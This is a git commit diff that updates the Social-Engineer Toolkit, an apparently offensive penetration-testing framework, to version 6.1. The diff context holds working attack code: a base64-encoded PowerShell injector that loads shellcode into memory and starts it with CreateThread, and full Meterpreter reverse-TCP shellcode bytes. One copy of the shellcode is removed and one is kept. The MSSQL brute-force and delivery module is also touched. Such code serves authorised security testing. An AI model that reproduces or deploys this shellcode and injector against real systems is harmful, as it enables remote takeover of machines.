Update to SET v6.1

2024-12-04 18:19:41 +00:00 · 2014-11-26 11:43:55 -05:00 · 2014-11-26 11:43:55 -05:00 · a23acaa681
commit a23acaa681
parent bc9c690406
3 changed files with 39 additions and 25 deletions
--- a/src/core/setcore.py
+++ b/src/core/setcore.py
@ -230,7 +230,7 @@ def print_error(message):
    print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC

 def get_version():
-    define_version = '6.0.5'
+    define_version = '6.1'
    return define_version

 class create_menu:
@ -262,6 +262,7 @@ def validate_ip(address):
            else:
                print_error("This is not a valid IP address...")
                raise socket.error
+                
        else:
            raise socket_error

@ -801,8 +802,8 @@ def show_banner(define_version,graphic):
    print bcolors.BLUE + """
 [---]        The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""")         [---]
 [---]        Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""")         [---]
-[---]                Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+"""                    [---]
-[---]             Codename: '""" + bcolors.YELLOW + """Rebellion""" + bcolors.BLUE + """'                [---]
+[---]                 Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+"""                     [---]
+[---]            Codename: '""" + bcolors.YELLOW + """Family Rootz""" + bcolors.BLUE + """'              [---]
 [---]        Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+"""         [---]
 [---]        Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+"""        [---]
 [---]       Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+"""       [---]
@ -1235,25 +1236,26 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):

    # generate our shellcode first
    shellcode = metasploit_shellcode(payload, ipaddr, port)
-    shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
-    # sub in \x for 0x
-    shellcode = re.sub("\\\\x", "0x", shellcode)
-    # base counter
-    counter = 0
-    # count every four characters then trigger floater and write out data
-    floater = ""
-    # ultimate string
-    newdata = ""
-    for line in shellcode:
-        floater = floater + line
-        counter = counter + 1
-        if counter == 4:
-            newdata = newdata + floater + ","
-            floater = ""
-            counter = 0
+    if not "reverse_http" or "reverse_https" in payload:
+        shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
+        # sub in \x for 0x
+        shellcode = re.sub("\\\\x", "0x", shellcode)
+        # base counter
+        counter = 0
+        # count every four characters then trigger floater and write out data
+        floater = ""
+        # ultimate string
+        newdata = ""
+        for line in shellcode:
+            floater = floater + line
+            counter = counter + 1
+            if counter == 4:
+                newdata = newdata + floater + ","
+                floater = ""
+                counter = 0

-    # heres our shellcode prepped and ready to go
-    shellcode = newdata[:-1]
+        # heres our shellcode prepped and ready to go
+        shellcode = newdata[:-1]

    # powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
    powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" %  (shellcode))
@ -1349,7 +1351,6 @@ def metasploit_shellcode(payload, ipaddr, port):

    # if we are using reverse meterpreter tcp
    if payload == "windows/meterpreter/reverse_tcp":
-        #shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"
        shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"

    # reverse https requires generation through msfvenom
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@ -1,6 +1,7 @@
 #!/usr/bin/python
 from src.core.setcore import *
-from impacket import tds
+#from impacket import tds
+import src.core.tds as tds
 import sys
 import subprocess
 import socket
@ -11,6 +12,7 @@ import binascii
 import base64
 import shutil

+
 #
 # this is the mssql modules
 #
@ -21,6 +23,17 @@ operating_system = check_os()

 msf_path = meta_path()

+try:
+    from impacket import tds
+except ImportError:
+    if os.path.isdir("/usr/share/pyshared/impacket"):
+        sys.path.append("/usr/share/pyshared/impacket")
+        import tds
+        sys.path.append(definepath)
+
+    else:
+        print "[!] Impacket is not installed. This menu will not work."
+        sys.exit()
 #
 # this is the brute forcer
 #
@ -105,7 +118,7 @@ def deploy_hex2binary(ipaddr,port,username,password):
    if match:
        print_status("Powershell was detected on the remote system.")
        option_ps = raw_input("Do you want to use powershell injection? [yes/no]:")
-        if option_ps == "" or option_ps == "y" or option_ps == "yes":
+        if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
            option = "1"
            print_status("Powershell delivery selected. Boom!")
        else: option = "2"
--- a/src/teensy/powershell_shellcode.py
+++ b/src/teensy/powershell_shellcode.py
@ -134,7 +134,7 @@ Keyboard.send_now();
 }
 """)
 print "[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir)
-if not os.path.isfile(setdir + "/reports/"):
+if not os.path.isdir(setdir + "/reports/"):
    os.makedirs(setdir + "/reports/")
 filewrite = file(setdir + "/reports/teensy.pde", "w")
 filewrite.write(teensy)